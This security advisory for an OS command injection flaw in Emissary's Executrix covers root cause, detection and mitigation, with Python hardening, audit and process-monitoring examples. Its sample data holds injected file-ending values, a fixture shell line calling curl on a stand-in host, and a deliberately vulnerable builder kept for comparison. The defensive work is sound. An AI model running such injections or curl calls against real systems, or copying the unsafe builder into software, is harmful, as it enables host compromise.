CVE-2026-35582 Overview
CVE-2026-35582 is an OS command injection vulnerability in Emissary, the NSA's peer-to-peer data-driven workflow engine. The flaw resides in Executrix.getCommand(), which interpolates temporary file paths into a /bin/sh -c shell command string without escaping or input validation. The IN_FILE_ENDING and OUT_FILE_ENDING configuration keys flow directly into these paths. An attacker who can author or modify a .cfg file can inject arbitrary shell metacharacters that execute commands in the JVM process's security context. The issue affects Emissary versions 8.42.0 and below and is fixed in version 8.43.0.
Critical Impact
A place author with .cfg write access can achieve arbitrary OS command execution under the Emissary JVM identity, with full compromise of confidentiality, integrity, and availability on the host.
Affected Products
- NSA Emissary versions up to and including 8.42.0
- Deployments using Executrix with custom IN_FILE_ENDING or OUT_FILE_ENDING values
- Downstream frameworks embedding Emissary place configurations
Discovery Timeline
- 2026-04-18 - CVE-2026-35582 published to NVD
- 2026-04-24 - Last updated in NVD database
Technical Details for CVE-2026-35582
Vulnerability Analysis
The defect is classified under CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Emissary's Executrix.getCommand() method constructs a shell invocation by concatenating configuration-supplied strings into a /bin/sh -c command. The framework already enforces an allowlist on placeName before embedding it into the same shell string, but applies no equivalent sanitization to IN_FILE_ENDING or OUT_FILE_ENDING values. Because these values become part of temporary file paths inside an unescaped shell string, any shell metacharacter introduced through configuration is interpreted by /bin/sh rather than treated as a literal filename component.
Root Cause
The root cause is missing input neutralization at a framework boundary. Executrix neither escapes file ending values nor documents preconditions forbidding shell metacharacters in those fields. Downstream implementors have no safe way to mitigate the issue at the configuration layer because the unsafe concatenation occurs inside the framework itself.
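The following is an added example (not Emissary's own Java code) that models the defect and its fix in Python: the vulnerable shape interpolates the two file endings into a single string passed to /bin/sh -c, while the hardened shape validates each ending against an allowlist and builds an argv list that is executed without a shell. A third function shows what quoting alone would do when a shell string is unavoidable. The allowlist pattern, the tool path and the temporary-directory layout are assumptions for illustration.

```python
import re
import shlex
from typing import List

# Allowlist for IN_FILE_ENDING / OUT_FILE_ENDING values: an optional leading dot
# followed by 1-16 letters, digits or underscores (".in", ".out", "txt").
# The pattern is this example's own choice, not one taken from Emissary.
FILE_ENDING_RE = re.compile(r"^\.?[A-Za-z0-9_]{1,16}$")


class UnsafeConfigValue(ValueError):
    """Raised when a configuration value must not reach a command line."""


def is_safe_file_ending(value: str) -> bool:
    return FILE_ENDING_RE.match(value) is not None


def validate_file_ending(value: str) -> str:
    """Reject anything outside the allowlist before it is used in a command."""
    if not is_safe_file_ending(value):
        raise UnsafeConfigValue(f"file ending rejected: {value!r}")
    return value


def build_command_unsafe(exe: str, in_ending: str, out_ending: str, tmpdir: str) -> List[str]:
    """The vulnerable shape: config values are interpolated into one string that is
    handed to /bin/sh -c, so any metacharacter in an ending is parsed by the shell
    instead of being part of a filename. Kept here only for comparison."""
    cmd = f"{exe} {tmpdir}/input{in_ending} {tmpdir}/output{out_ending}"
    return ["/bin/sh", "-c", cmd]


def build_command_safe(exe: str, in_ending: str, out_ending: str, tmpdir: str) -> List[str]:
    """Hardened shape: validate both endings, then build an argv list that is executed
    directly (subprocess.run(argv) here, ProcessBuilder in Java). No shell is involved,
    so there is nothing left for a metacharacter to be interpreted by."""
    in_e = validate_file_ending(in_ending)
    out_e = validate_file_ending(out_ending)
    return [exe, f"{tmpdir}/input{in_e}", f"{tmpdir}/output{out_e}"]


def build_shell_string_quoted(exe: str, in_ending: str, out_ending: str, tmpdir: str) -> str:
    """If a shell string is genuinely unavoidable, every interpolated piece must be
    quoted so the shell sees it as one literal word. Shown without validation to
    illustrate what escaping alone does; in practice run the allowlist first."""
    argv = [exe, f"{tmpdir}/input{in_ending}", f"{tmpdir}/output{out_ending}"]
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    print(build_command_safe("/usr/bin/tool", ".in", ".out", "/tmp/w"))
    print(build_shell_string_quoted("/usr/bin/tool", ".in", ".out; echo x", "/tmp/w"))
    try:
        build_command_safe("/usr/bin/tool", ".in", ".out; echo x", "/tmp/w")
    except UnsafeConfigValue as err:
        print("rejected:", err)
```

The important design point is that validation happens at the framework boundary, before the value is used, which is exactly where Executrix omitted it; quoting is a second layer, not a substitute, because a quoted but unvalidated value still lets configuration authors steer filenames in ways the place never intended.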
Attack Vector
Exploitation requires local configuration authorship. An attacker who can write or modify a place .cfg file sets IN_FILE_ENDING or OUT_FILE_ENDING to a value containing characters such as ;, `, $(), or |. When Emissary executes the place, Executrix.getCommand() interpolates the malicious string into the /bin/sh -c invocation, and the shell evaluates the injected metacharacters as commands. No API access, network access, or runtime privileges beyond configuration authorship are required. The injected commands run with the privileges of the Emissary JVM, which may exceed those of the configuration author; this is why the CVSS vector records a scope change (S:C).
No verified public proof-of-concept code is available. Refer to the GitHub Security Advisory and patch commit for technical details.
Detection Methods for CVE-2026-35582
Indicators of Compromise
- Unexpected child processes spawned by the Emissary JVM, particularly /bin/sh -c invocations with embedded metacharacters
- Modifications to .cfg files containing IN_FILE_ENDING or OUT_FILE_ENDING values with shell special characters such as ;, |, `, or $()
- Outbound network connections or file writes from the Emissary process inconsistent with normal workflow behavior
Detection Strategies
- Audit all Emissary .cfg files for non-alphanumeric characters in IN_FILE_ENDING and OUT_FILE_ENDING keys
- Monitor process trees for shell processes whose parent is the Emissary Java process and correlate against the place execution schedule
- Apply file integrity monitoring to the Emissary configuration directory and alert on unauthorized writes
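As an added example (not part of the advisory or of Emissary), the audit in the first strategy above can be scripted: the function below scans .cfg text for IN_FILE_ENDING and OUT_FILE_ENDING assignments and reports any value that is not purely an optional dot plus alphanumerics, listing the shell metacharacters it contains. The line format (one KEY = "value" per line, # for comment lines) and the sample configuration are assumptions constructed for the example.

```python
import re
from typing import List, Optional, Tuple

WATCHED_KEYS = {"IN_FILE_ENDING", "OUT_FILE_ENDING"}

# Characters that /bin/sh treats specially; any of these in a file ending is a finding.
SHELL_METACHARS = set(";|&`$()<>{}[]*?~\\\"' \t\n")

# Same allowlist idea as the hardened construction: optional dot plus [A-Za-z0-9_].
CLEAN_ENDING_RE = re.compile(r"^\.?[A-Za-z0-9_]+$")

# Constructed sample .cfg content; assumed format is KEY = "value", one per line,
# with '#' starting a comment line. This is not a real Emissary configuration file.
SAMPLE_CFG = """\
# place configuration (constructed sample)
PLACE_NAME = "ExamplePlace"
IN_FILE_ENDING = ".in"
OUT_FILE_ENDING = ".out; echo injected"
IN_FILE_ENDING = ".dat$(id)"
TIMEOUT = "30"
"""

# (line number, key, value, offending characters sorted and joined)
Finding = Tuple[int, str, str, str]


def parse_line(line: str) -> Optional[Tuple[str, str]]:
    """Split a KEY = "value" line; return None for blanks, comments and non-assignments."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or "=" not in stripped:
        return None
    key, _, raw = stripped.partition("=")
    value = raw.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return key.strip(), value


def audit_cfg(text: str) -> List[Finding]:
    """Return one finding per watched key whose value falls outside the allowlist."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        key, value = parsed
        if key not in WATCHED_KEYS or CLEAN_ENDING_RE.match(value):
            continue
        bad = "".join(sorted(c for c in set(value) if c in SHELL_METACHARS))
        findings.append((lineno, key, value, bad))
    return findings


if __name__ == "__main__":
    for lineno, key, value, bad in audit_cfg(SAMPLE_CFG):
        print(f"line {lineno}: {key} = {value!r} contains shell metacharacters {bad!r}")
```

Run it over every .cfg under the configuration directory as part of a pre-deployment check or a file-integrity alert handler; a finding with an empty metacharacter string still means the value is outside the alphanumeric allowlist and deserves review.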
Monitoring Recommendations
- Forward Emissary process telemetry and host shell execution logs to a centralized analytics platform for behavioral analysis
- Alert when the Emissary JVM executes commands referencing unexpected binaries such as curl, wget, nc, or bash
- Track configuration commits in version control and require code review for changes to file ending fields
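The process-tree and unexpected-binary checks from the two lists above, as an added example that is not part of the advisory: the analyzer below walks process-start events, keeps only shell processes whose parent is the Emissary JVM, and grades each one by whether its command line contains shell metacharacters or references curl, wget, nc or bash. The event shape, PIDs, paths and the convert tool are constructed for the example, and the JVM is identified by an assumed heuristic (comm "java" with "emissary" in its command line).

```python
import json
import shlex
from typing import Dict, List, Set

SHELLS = {"sh", "bash", "dash"}
# Binaries the advisory lists as unexpected for the Emissary JVM to invoke.
UNEXPECTED_BINARIES = {"curl", "wget", "nc", "bash"}
SHELL_METACHARS = set(";|&`$()")

# Constructed process-start events, one JSON object per line, loosely shaped like an
# EDR or auditd export. PIDs, paths and the convert tool are invented for the example.
SAMPLE_EVENTS = """\
{"pid": 4100, "ppid": 1, "comm": "java", "cmdline": "/usr/bin/java -jar /opt/emissary/emissary.jar server"}
{"pid": 4180, "ppid": 4100, "comm": "sh", "cmdline": "/bin/sh -c /opt/tools/convert /tmp/w/input.in /tmp/w/output.out"}
{"pid": 4181, "ppid": 4180, "comm": "convert", "cmdline": "/opt/tools/convert /tmp/w/input.in /tmp/w/output.out"}
{"pid": 4200, "ppid": 4100, "comm": "sh", "cmdline": "/bin/sh -c /opt/tools/convert /tmp/w/input.in /tmp/w/output.out; curl http://example.invalid/x"}
{"pid": 4201, "ppid": 4200, "comm": "curl", "cmdline": "curl http://example.invalid/x"}
{"pid": 5000, "ppid": 1, "comm": "sh", "cmdline": "/bin/sh -c ls"}
"""


def load_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_emissary_jvm(event: Dict) -> bool:
    # Assumed heuristic: comm "java" plus "emissary" somewhere in the command line.
    return event["comm"] == "java" and "emissary" in event["cmdline"].lower()


def referenced_binaries(cmdline: str) -> Set[str]:
    """Basenames of every word on the command line (tolerates unbalanced quotes)."""
    try:
        words = shlex.split(cmdline)
    except ValueError:
        words = cmdline.split()
    return {w.rsplit("/", 1)[-1].rstrip(";") for w in words}


def analyze(events: List[Dict]) -> List[Dict]:
    """Flag shell processes whose parent is the Emissary JVM and grade them."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Dict] = []
    for ev in events:
        if ev["comm"] not in SHELLS:
            continue
        parent = by_pid.get(ev["ppid"])
        if parent is None or not is_emissary_jvm(parent):
            continue
        meta = "".join(sorted(set(ev["cmdline"]) & SHELL_METACHARS))
        binaries = sorted(referenced_binaries(ev["cmdline"]) & UNEXPECTED_BINARIES)
        if binaries:
            severity = "high"
        elif meta:
            severity = "medium"
        else:
            # Plain shell child of the JVM: expected for a place that runs a tool,
            # so correlate it with the place execution schedule rather than alert.
            severity = "info"
        findings.append({"pid": ev["pid"], "ppid": ev["ppid"], "severity": severity,
                         "metachars": meta, "binaries": binaries, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in analyze(load_events(SAMPLE_EVENTS)):
        print(f"{f['severity']:6} pid={f['pid']} metachars={f['metachars']!r} "
              f"binaries={f['binaries']} cmdline={f['cmdline']}")
```

The "info" findings are the baseline that the schedule correlation in the second strategy needs: a place that legitimately shells out produces one per execution, so a shell child that appears off-schedule, or one graded "medium" or "high", is what should page someone.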
How to Mitigate CVE-2026-35582
Immediate Actions Required
- Upgrade Emissary to version 8.43.0 or later, which fixes the unsafe command construction in Executrix.getCommand()
- Restrict write permissions on Emissary .cfg files to a minimal set of trusted operators
- Inventory existing configurations and remove any IN_FILE_ENDING or OUT_FILE_ENDING values containing shell metacharacters
Patch Information
The fix is delivered in Emissary 8.43.0. Review the upstream patch in the GitHub commit 1faf33f and the GitHub Security Advisory GHSA-3p24-9x7v-7789 for full remediation details.
Workarounds
- No safe downstream workaround exists because the unsafe concatenation occurs inside the framework; upgrading is required
- As a temporary compensating control, run Emissary under a dedicated low-privilege service account with restricted filesystem and network access
- Enforce mandatory access controls such as SELinux or AppArmor profiles to limit what the JVM child shell can execute
# Compensating control example: restrict configuration write access
chown -R emissary:emissary /opt/emissary/config
chmod 750 /opt/emissary/config
find /opt/emissary/config -name '*.cfg' -exec chmod 640 {} \;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


